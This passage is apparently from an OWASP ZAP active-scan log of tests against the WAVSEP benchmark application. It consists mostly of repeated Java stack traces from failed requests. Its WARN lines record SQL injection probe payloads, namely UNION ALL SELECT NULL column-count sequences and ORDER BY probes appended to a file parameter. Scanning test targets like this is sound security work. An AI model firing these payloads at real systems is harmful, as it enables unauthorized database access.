org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922698 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922699 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922701 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922702 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922703 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922705 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922706 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922707 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922709 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922710 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922712 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 3486#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 3486# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922713 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at 